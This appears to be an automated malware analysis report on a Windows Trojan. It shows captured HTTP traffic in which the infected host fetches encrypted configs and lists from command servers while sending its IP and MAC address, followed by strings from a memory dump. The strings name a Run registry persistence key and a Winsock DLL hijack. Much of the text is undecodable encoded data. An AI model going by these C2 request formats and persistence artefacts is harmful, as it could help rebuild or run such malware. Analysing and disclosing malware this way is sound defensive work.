Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu7vg7o4OGLvAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnJX2G2Yw6VqVQ6FniCe06ZDVEnGhKZIy9GgiH6/wrMOvilrWtIoUgA8dl63vkFlYsv808n9xoPjKOkA0d9/AUDVLIWyJKGfQ30oQdaSw ooRKP3TITS70qtG23VOoAzU/dEk APRjAGee1kHoMkGXR442O5E7FXkFrE2s0NmUj5ay0C63Xri3dB7txKLcg4QGva912G4GnwNO6uG0yW9iLynDUHq/HLA1I0Mgx7sTvMrqVegigsaPAMlycn0DaQTrXm/H8aJaRsqeb8fxolpGypFklHa0IUJrWtj4tOAGKUF sMaJudVXlW6wxom51VeVZRJhvIVRruRFx5KEBxs2/8UZSS65y3h1b0AuZLZP47s8TazQ2ZSPlrxNrNDZlI Wukxah1b3uqqMTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrTPMmJn/9ziG LTy9adcaKIsYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMaxjFZ7AA7l/dPFp2Oo4QVxT3CU2MTazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWBNKEt5jwcC0SLZsRYA4Cs/E2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoLD oURZpHHpqzKdokEsJbVR23tr2s6uv3 o5ZREMMJf0vpcLusis07 NvMwA6jAbzQgABzIbqI92FStaOaeCfpWjRWrVGp Dwvn3pFK8vui2f77PmI XJuiyzi0Zkkx56pL9K75Mk7A9r648UKKHO63ouLGnQi8l0bpnC5T0Yty5kQ41Wy3 HVsBv5Bepmeh2dZe/TnDXSN51O5
<<< skipped >>>
GET /desk/cfg.ini HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pro.52icafe.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 275
Accept-Ranges: bytes
Server: Tengine/2.0.2
Date: Sat, 04 Apr 2015 04:49:11 GMT
Last-Modified: Fri, 27 Mar 2015 03:31:20 GMT
ETag: "5514cf08-113"
Expires: Sun, 05 Apr 2015 04:49:11 GMT
Cache-Control: max-age=86400
Age: 50667
Powered-By-ChinaCache: HIT from 060320b3SX
[ico].num=3.[0].Ico_min=178.Ico_max=178.name=.........url=hXXp://g.2ksm.com/s/1/999/23903.html?uid=505519.[1].Box=0.Ico_min=190.Ico_max=190.name=.........url=hXXp://uimg.1qwe3r.com/mrcode.php?ai=50511.[2].Box=0.Ico_min=180.Ico_max=189.name=.........url=hXXp://ico1.fdc321.comt>....
GET /desk/ico/178.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pro.52icafe.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Sat, 04 Apr 2015 03:37:34 GMT
Content-Type: image/x-icon
Content-Length: 16958
Last-Modified: Thu, 08 Jan 2015 09:44:44 GMT
ETag: "54ae518c-423e"
Expires: Sun, 05 Apr 2015 03:37:34 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
Age: 54965
Powered-By-ChinaCache: HIT from 060320b3SX
......@@.... .(B......(...@......... ..............................................)@..(?g.(?..*@..*>..-?...?..!3...$......."...............(..*?..!8.......)........................................................................................................................................f.....................................;^..'?h.(@..'?..$=..&>..*>..*?..(?..,@..,@..(@..!:...6..";..&=..'>...=...7...-....................................................................................................................................................h.........................Kz..:^..3S..7Z..Fq..T...V.."b.. q..,w..(z..&w..%q.."q..#q.."s...e...O...C...3x...8...&... ...*...&...".............................................................................. ....$................................................................."a...Q...M}..V.."j..'...&.../...&...1...8...;...@...2...#...)........s...[...>...-x..)m..&].."S.."K...C...<...*...'...&...#... ................................................... ..(5.............................."..."......................................%i.h!d..#l..(}.. ...-... ...-...,...).../...-...-...8...7...9...D...;o..%Q...F...K...M...6...&i..$V.. K...@...7...*...*...,...,...0...3...-...%... ........................../W..-I..............."..*>..1F../@..1<..19.../..($..#.....................h........,w..*|..,.../.......,... ...-...-...*...%...'...,...-.../...1...3...?...Q...K...*f..!^...R...5...)u..&\.."N..#I...;...<...@...@.. A.. B...;...3.......-...0........
<<< skipped >>>
GET /desk/ico/190.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pro.52icafe.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Sat, 04 Apr 2015 03:50:29 GMT
Content-Type: image/x-icon
Content-Length: 16958
Last-Modified: Thu, 12 Feb 2015 06:55:50 GMT
ETag: "54dc4e76-423e"
Expires: Sun, 05 Apr 2015 03:50:29 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
Age: 54191
Powered-By-ChinaCache: HIT from 060320b3SX
......@@.... .(B......(...@......... ......B......................................0ET-..,..%F..d...~...................................................................................................................................................................................~...b...7W...'...%0....................................Mo..If..............2...'g...Dd..Bl..Q..!S...Ou..a~..q..D...4...#...,...(...*.../...-.......#.......................................(...(.../...1...3...%...........6...4...&...X...9....Wx..[~..Xw..[y..o...............2U..(,.........................:f.*. >..:^.........................CSv...'.CSv.0?`...6............. GS.0Pa.Dn..............`...........................7...........T............&;.................W....DZ.........f.........J..&A...4..'F.. 6.. 1.......;..........?V...... "-.............a...1T..v.......@\...).Vl~................../P.6Hh.r.....8... .....$3:..26.X{...............CT.."4.................C....m...|..X...p...k.......s....2I..&9.@Xr.........Dn...@S.`.......................@g....9... ... ..! ......)).Pu.......^...... .&..........D`..Go......6[..&=...,...&.-GT.X~..............9Tw......"8...&.JZb...".->B.(AM..3E.. ?.."7.. ?...@.g........... ^}..b...k..1...9...'z...........F_..:S..(>.../.../.."5..1=..=L."DQ.i...^w..................n....C[..!7...)...%.....t|~../K......Ge.#.!......=W0.Ah......<f..(G...7...4...(...%.$EU..............3M.Pv....!...*..%-..... 38..!,.../...'..%8..6P..7O..H\.^..../I.'j..`...`...D...p...>....e..<{..'Xz..-A..&9...%...#.......(.
<<< skipped >>>
GET /desk/ico/184.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pro.52icafe.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Sat, 04 Apr 2015 07:24:58 GMT
Content-Type: image/x-icon
Content-Length: 16958
Last-Modified: Tue, 27 Jan 2015 08:43:08 GMT
ETag: "54c74f9c-423e"
Expires: Sun, 05 Apr 2015 07:24:58 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
Age: 41322
Powered-By-ChinaCache: HIT from 060320b3SX
......@@.... .(B......(...@......... ......@..................### ###4###H###Z###r###.###.""".###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.##$.##%.##%.##%.$$'.$$'.$$(.%%).%%*.''..''/.('0.))2.**5. *7., :.-,=..-?.0/B.0/C.20F.21H.43L.64N.96S.@=_.HElvPMxh_Z.Zoi.J.}.>###6###N###p###./%*.?&0.E'0.F(1.G)2.H)2.H)2.I*3.J*3.J*3.K*4.K*2.L 3.L 4.M 4.M 4.N,4.N,4.O,4.O-4.P-5.P,4.P,4.P,3.Q,4.Q-4.Q-5.R-5.R-5.Q-5.Q-5.P,4.Q-5.P-6.P-7.Q.8.P-7.P.8.P-9.P.;.P.;.P.<.P.=.P.>.P.@.Q.A.Q/B.Q0D.Q0F.Q0F.P0G.P/H.O/H.K.J.;/J.55Q.EBh.RO}pb].\yr.J###H"##t1$*.b&9..(D..-K..3P..7T..9V..;X..<W..>Z..?Y..@[..A\..B[..B[..CZ..E\..F]..G]..G]..H]..H]..I]..I]..J]..K]..K]..L^..M_..M_..M_..L_..L_..L^..L_..K_..J`..J_..J_..Ia..J`..Ia..Ia..Ha..Gb..Fb..Gd..Fe..Fe..Ef..Df..Ce..Af..?d..:b..4_../X.l-Q.@3Q.GDl.ZU.nmg.Z###^6$*.~ ;..$C..,J..3P..8V..<Y..?\..A^..C^..D_..D]..F_..G`..G^..H_..I`..Ja..Ka..Kb..K`..Mb..Mb..Na..Oa..Pa..Pb..Pa..Pb..Qb..Rc..Qb..Qc..Qb..Qc..Qd..Qc..Pd..Pd..Od..Od..Ne..Of..Ng..Ng..Mg..Mh..Mi..Lj..Mj..Lk..Kl..Jl..Hl..Fj..Bh..;d..3_..*Y..(U.H5Y.SO~.ga.h %).t.8...=..(F..1N..7T..=Z..B]..D`..Fa..Ga..Ic..Ib..Jc..Kc..Lc..Mc..Nd..Od..Pd..Pe..Qd..Qd..Re..Se..Sf..Td..Ue..Ud..Ud..Ue..Ve..Ue..Ue..Ve..Vf..Uf..Ug..Ug..Uh..Uh..Tg..Si..Tj..Tk..Sk..Sl..Sm..Sn..Rn..So..Ro..Qq..Pp..Or..Lp..Hm..Bj..9c..0]..$W..(W.LDn.c^.tL"3...7.."@..,K..4R..;X..A_..Ea..Hd..Id..Kf..Lf..Me..Ng..Nf..Of..Pg..Qg..Sh..Sh..Sh..Sh..Uh..Uh..Vh..Wg..Vf..Wh..Xh..Xh..Xh..Zh..Yh..Yh..Yi..Yj..Xh..Yj..Yk..Xk..Xl..Xk..Wm..Xn.
<<< skipped >>>
GET /plus/config/wuwei8896.1.bin?ver=3.180&lip=192.168.220.134&mac=000C293FC930 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: plus.zzinfor.cn
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.3
Date: Sat, 04 Apr 2015 18:52:49 GMT
Content-Type: application/octet-stream
Content-Length: 1687
Connection: close
Expires: Sat, 04 Apr 2015 18:52:49 GMT
Cache-Control: max-age=0
....<.......`.......X..HXO>B..........................,......T..mz3nU....J..&jG..KCW...O.m8s09j?`h?m<$R.....................................................................................v...`....g.{.U.%..O..e......................./.........................................................O^EL..%7<m0-Ck.,GW.p...`U..~-.".~. -.....9.....5-:hyFXNjm,qh5.` .......................................................................n...........Q...Y..?..U.................... ..................................................ff4pb7l{2)Y.^ {..her^........Y#.........3.c.....>mz(9..JB.(t>...p,...f.5$X.f3#LOV..[Gz5|w($u4$oQ_.[Y..x28/5`dV.6j.....j...tf..h..I@....^.M........er../w1(c...Cdon....h4....19*t?.{k$..A.Bls.tv6H.'7*mewg<p..X..._Q...rj:i.".J......h...h>....J......YX....u....'Xzh2z(g/77*,<v?`Rm4............................................................j..........UU....'.&Pw......he.YCqy9..IUXNf%.LK`5.............................................................h....,......W'...i..2N.0.......................4............................................................f...$...JH.......=@.8.Q.....Ã >&.KNlls0%JKuq.3...STDrsz4mj u&;<7jG8%s=:.=(t1)}mr|(T....f?1y(0=%2}Dv......c.......wS:.)<.Q.ktQ.E......ycQ..7k)....Zd8k2...!.5$X.fx=;8/tdJA.ki%;p9".NL.RCV. 4`{=%(;-x>$RGb[Br.....r...`%!.Vd.HnYa..GW.........:u.W...Q@Y.w30}8).x\b>u ...E._.WJ.XEMY.]./kf%.>y.OD{'}~jT.S.X...L.Cz$.....-93$8wu$>K.Z.udDX....@..'...y...[.u....(..............-................................................
<<< skipped >>>
GET /txt/listsf_20150403180242.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=6800044940E2E0AB155EC34DEDF2EFE7 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:29 GMT
Content-Type: text/plain
Content-Length: 943732
Last-Modified: Fri, 03 Apr 2015 10:02:43 GMT
Connection: close
ETag: "551e6543-e6674"
Accept-Ranges: bytes
fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROdajLffC7CLAARuVDFElV4lEjSkzOz/kAlpGS VxJ6wCxq3njHLHGDrSpd4t9GUG/XenWQ2aIx2jsui0o8oZPf LOn2ww/Npy2/VNK6uLArY 2DOaLZnkRwmT/bQFdsn0vTxPrhlCcFy k 20AuZlNpLR5W3egF9UDl Z5p lIkp5QaoNWO/91c1pXUqdcHQR1dHg92w1v/LGlOT0VJAnJ36Js9TQHPrsujnxEp37 HoD5p/PsyBOfMwDGEoMtRE5ky9HGzVzp2Oj9/H/lH7C6KbqybZ8CFAAC pK9yNnlse88CyAWsKq19UQycMmZKWFjKsOwfP4K/6iD9wJ7Q56a76E0//4vK0u/k5TIUnKG9bYZGLV4s1PfX/O4rQwerqn4jIePUlfjQi7CkoCiNgdta2vxUFTm9wh1nz0osLYhQnt4il0RRuD6aN0TYaR3XP6XeBJFn9uuoFBmIvo/wiM6gBmct5GdqTfYBe7DnRXLQtZgVvPcKlAIkefOq5hEex1DN eLPXJa2a7bghgMlW7mipls1mJHc9ys4/xs 9meRS3JrCz1veY7nhfcNRYLXROExXv1iYv6H WhriQyigJVizQXrcet8OpvLBHz2fi2n7hNNq286slic3Vd8/gntSCmepuWtO7BES 6SzN5DNTolAKPUQ4qj4b0 U0pb5crra/r/mz/jOnC KIhUoLtqKkssNOWnRvjyTUoNWVN4A0pbpyHrxR6tC8OcT3RwWMW6/n6qNjk30mm3OARwLBhlR5oaMFHGYkFxgWqvFgeDRDL7zL6f/FuMd4R Iq6EE2YHT2ed7WtaL5Un MmEmt7WfYsbNq14DBberjBkyE7HHNExPF2vULtCIHA1P0yh12RkIe 8Tt8oBpNsEa1DMhJUop/jxtH1Ny2d9l/ELtGCOteiO9lMcs552QIUMfhXfFegIzdf3kHKizDVJa5b0guBCq40ru1AQKUlim2dLDDLQEHl4NaJfMzZkWqoQJS5WZoSI634lqP3IeRpPe/wCtnfZw6NqhAfAo5rXb1SP1lTTXFsU69YlE6i0dfomz1NAc uxYI7knJsBotL9vUWdQMPNxD9xMIdLl1wSPq9U7sIHH9NvNQlxdA0qVKIPEpO Off6RBAeAGR1Wnmntsj/CxA6g1enx CBeybNbpcjLWBG62lzyGFUYDXvo7Q71lU9iWi6TDFgNKi3yp9Sott3AI5 M281CXF0DSpWgGKc8YJkZNEoMU2ddoj8MIAcZrtk/HfiCp9o3sgQnA4Y/L2IrekaSXG5AHOfPhajoVqg8YfVY3NJKUsceCuFZzEKdCo4H8TnNJhxH3 uueYJ/GG6CXRUzPYwhIxxG 0nt7ewSAOl4BiiVTPgfum562uZCJljJXaUDZOOUBVYyUtBkC9 1LadbFH/j9zrQCwkudOuqG3c 8270rQ16n/dwiQ27OB4y9G /I0/ooFLXIncYYvJ TUIb6oo9QRCtQJDRnPxQd8p2io6k riaE8UE
<<< skipped >>>
GET /txt/listbc_20150404215834.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=89C04AF80E849FEC0059588AF9D40675 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:32 GMT
Content-Type: text/plain
Content-Length: 671336
Last-Modified: Sat, 04 Apr 2015 13:58:36 GMT
Connection: close
ETag: "551fee0c-a3e68"
Accept-Ranges: bytes
fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROdajLffC7CLCs7GeQSgT0LMSbeMnDrAUu1dbIATI0j4FGOPHCp5fsPM5bcpV9gVv8YkHx4yvOvi PhjnvseNCjxbHglVJKEsfQC1ZE3OCWcvzQbmwCDTQERo7OM0Dsq9ls0obQpmD2yxPW1UfPcgCHpTPb8Y2RJ4h/W/IUoPzmCxZDs116MO2q4P28tueyzvM3jq1nHFshfdphDeIwHThmFssE0A1Pr4qHrkZJuBKno3KVx3e0jT3j7ZHTLmq9Cl15DrYBrHijmrQsV7P5Z v11HmVz3qARYsHSgvX2p93mW75tcyo4i4cXSuNqV4XlCaXso7ucBG/H8fRAKUsrrkw9cIameaUKTw7jvW91i66L0GHh4/uwcqQAzybLIfRfffCP/ 17vZdFfb6am/3VfiqTYvvjyZX3zDmv9KP2Ld4kfjefKFmYzZb1buJgIcHQNVbkQZmMyyQo6vEiUh7DzU7sPkgD2j rwITlxQHJ3qG7Rpz96fvejf3yKyAB2Jt SMsvYR0z2VvfIf8bxWNgKAWXbaeVELwBRK8y4wi4j24JjQJjG7u1Xpc5BtwjuJa5ySDSOGD1cslwsCTpfSGIAzrg5HBpIqJBlEkioafCimRbx22nlRC8AUSnBowDXDoKSEdNfCrOXZCTq4Sj4Di7/mMhRuCyyHdlaqmF5IXbe8jUOlHkCWEyyB8EbpRg6Mp331mmV3Mb 5zbyPLM3/6iQm5UrxEOLXuVD1r1u6bdoOojUF7Y6WmItj5oHy6K2rbfQog/by257LO8xjNEqzdFfuTWr7rSlxGJXdF7APbjAq bJRB7Gd653cwvAQvd9Aa1auBq3HUOen06T f/tYFXf2j6SEdPZ1RXXp X/ILlgTB/IlcGyaRE855xyxyNcTnnljCMeXNabM6EJtexlvw0QqHfPaDkpX7FoA8KoHVtopXClCn/RU3pLqM2LFIgz7JD72wxKdPaxzM4BkCNtiAICqlEO9OfJCW577Zvn28WWptiBje 20jAcFOdEoP/5MnsYKUfxNU8niCc1p2iz2nuCC6kPvRXzm0N73Yp5 Wk57QxbMGb 5UsBy5EfQBl7W0q6ItuztwyIIngRqIHDtl90EbCKrd5G62qqT6akyZfoWywKcMQLBRp1gDmKeflpOe0MWLAEQt8baZ6xH0AZe1tKuiKUeQJYTLIHwH57K0OgyuqQtwICxpqtm1hJB1xQGpBMP/Ju6HhpnFOGGPy9iK3pGknANK6Jryn2TRHfgDB5emdpinn5aTntDFuMoeDl4A2Iby8vtL8r1JM6l/brt2HMUr3SctnX3LoYwJhyjVKOZ2dAWzEnlu9MIT0hDq2HuubrbVburqa5rTZvM58h61Wi7LMlaegKszfeg3DPXFjbdvLYgZ9Xj4X6coUWXdkdHVcKFAFG8WoEkDEEvH//zIJYifeY8DthlBxGVGj3DhG0P1ayqqY8pjKyF3WEs13BbTHXtW1dtOpfjV9LmwbmiS xQvfa5RqidBudg
<<< skipped >>>
GET /txt/multi_150401a.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=F1C5E71158F2AA48584F3E420C9C8905 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:20 GMT
Content-Type: text/plain
Content-Length: 1160544
Last-Modified: Wed, 01 Apr 2015 09:48:49 GMT
Connection: close
ETag: "551bbf01-11b560"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WsUwC6UEPuUHwksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnIP fm 1kX2EpoHPH5y5fSneWMVIcz20hnNCxGkQAG516OSetD3NWwIMVujg9tENOcBTmBWb 7G4WvM1YMoYBR1n/05aTY1HqnuPhzq4dW5N1TlrsSqOdfLX98HF1wgyOXjTHacUFiklRw1yD51UqgiV0AoG /mZXPE2s0NmUj5a8TazQ2ZSPlrueKHSyn HxIR1SJjLO74XPdg0 sDpLF95oztb rsJOq s8Ysjc2A1NnrHs9IEB3ze0Rrwsy6d8uXJyfQNpBOtYm ARi1SoBtib4BGLVKgG2aGS9/2lLN2w/TTJNbMs336wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI WtxVTKO98tU Ulb6xRQPYFcxNrNDZlI WvE2s0NmUj5axzbXR wlUOd1udoPMpY2p/E2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrQFU4iLP8df/E2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr0E5EPM10K1G5zDifOE4dhzE2s0NmUj5azE4dSQE6hF3aV6mEpZjZPWRFLQzZfoQutxncZxUXidxxNrNDZlI WvqkpwmtYwEg/WqE7QcsrWW69CtAj1kY2R5672j5HZoq8TazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWC8u eJPQb0XAiYgGUqBt3rE2s0NmUj5a qSnCa1jASD 8BgGQTR5rUy /T2K3JHIn9Bu0mkYE 2xNrNDZlI WtlbVeP21o8lsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a80g7PwSDjpK2E0E4cxijhRTosG6X1WJKNGbDqOkocKG/Y20xSgdf/GrTzUSVsP2Z2R5x49eQN1kRmLhlwYHh/dn/gQ8oBRhRViFvkyNjI9EkZX9CUqPKznL5y1ptSZhF6sYrYY HE8uCwOxCHfECwTHNJHVo7OQn5LioQCSs4YA
<<< skipped >>>
GET /txt/deskico_20140926.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=F567147B1655CC25D70B4FAAF165D793 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:22 GMT
Content-Type: text/plain
Content-Length: 398688
Last-Modified: Fri, 26 Sep 2014 07:22:57 GMT
Connection: close
ETag: "54251451-61560"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu7vg7o4OGLvAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnLCp18hqxqUIH4hxrH2ruxBV4YQeeGJ65c5wsyHzRsh93kB/WAmaBgr2iApK/YyECWTZc3fHJpIC6vUQIdftw8fH Vki2LxKVQX QpVKPU/IIqA08 jlafX7oH6YXj9Lg9vljEjQvyO2cTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a X5Vy1wuSR9dgNryH0CP/d9OaA4pTXvaLuA FC6PJMNxIkW4hj6Qlxo55q3drEIlgh1fMm3K29506aW9b6VGbm/H8aJaRsqeb8fxolpGyp0Wl 66XOXiKtj4tOAGKUF sMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlrKF9xt0oWC4pNX9iA4EJt cTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a3r6RMlL8piAxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr6BDvLF8pk6 4Z HXUJYjwhZJR2tCFCa1xNrNDZlI WsxOHUkBOoRd2lephKWY2T1OF1I1jh1m7N8KoHU8nB51sTazQ2ZSPlr6pKcJrWMBIP1qhO0HLK1lqHsBdnJ2u6Qm0Tw5nyxlSrE2s0NmUj5a3C2I9Jaq5QiP0ady7illlhKe0c7qPxslDsLwTz3lb30xNrNDZlI WvqkpwmtYwEg8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
MainPro.exe_604:
.text
`.rdata
@.data
.rsrc
RSSSSSSh
FtPh"
FtPh,
u'SSh |B
Hx.SHx
Uxs.Ux
bx,IfxkFfxÿx
%s (%s:%d)
%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl
psapi.dll
games.exb
UserIP.ipb
ntdll.dll
SOFTWARE\Microsoft\Windows\CurrentVersion
x-x-x-x-x-x
serverport
clientport
\BCmain.exe
cnkftpserver
hXXp://%s/main_ad.html
ad%d.func2.cn
KERNEL32.DLL
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
AnnxePro.exe
MainPro.exe
\mswnsock.dll
\mswinsock.dll
%H,%A,%S,%B,%d,%D,%M,%m,%Y
%s\$sctemp%d.tmp
SYSTEM\CurrentControlSet\Services\WinSock2\TCPIPSH
%u.%u.%u
IeImgSnd.dll
IEXPLORE.exe
iexplore.exe
ad.adb
userip.ipb
CWebBrowser2
mfc90.dll
MSVCR90.dll
_amsg_exit
_acmdln
_crt_debugger_hook
GetWindowsDirectoryA
KERNEL32.dll
UnhookWindowsHookEx
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyA
ADVAPI32.dll
ShellExecuteExA
SHELL32.dll
COMCTL32.dll
ole32.dll
MSVCP90.dll
WS2_32.dll
IPHLPAPI.DLL
WINMM.dll
GetProcessHeap
.PAVCException@@
.?AVCCmdTarget@@
;3 #>6.&
'2, / 0&7!4-)1#
.PAVCInternetException@@
.?AVCWebBrowser2@@
.?AVCUDPComm@@
Bogus message code %d
Invalid component ID %d in SOS
IDCT output block size %d not supported
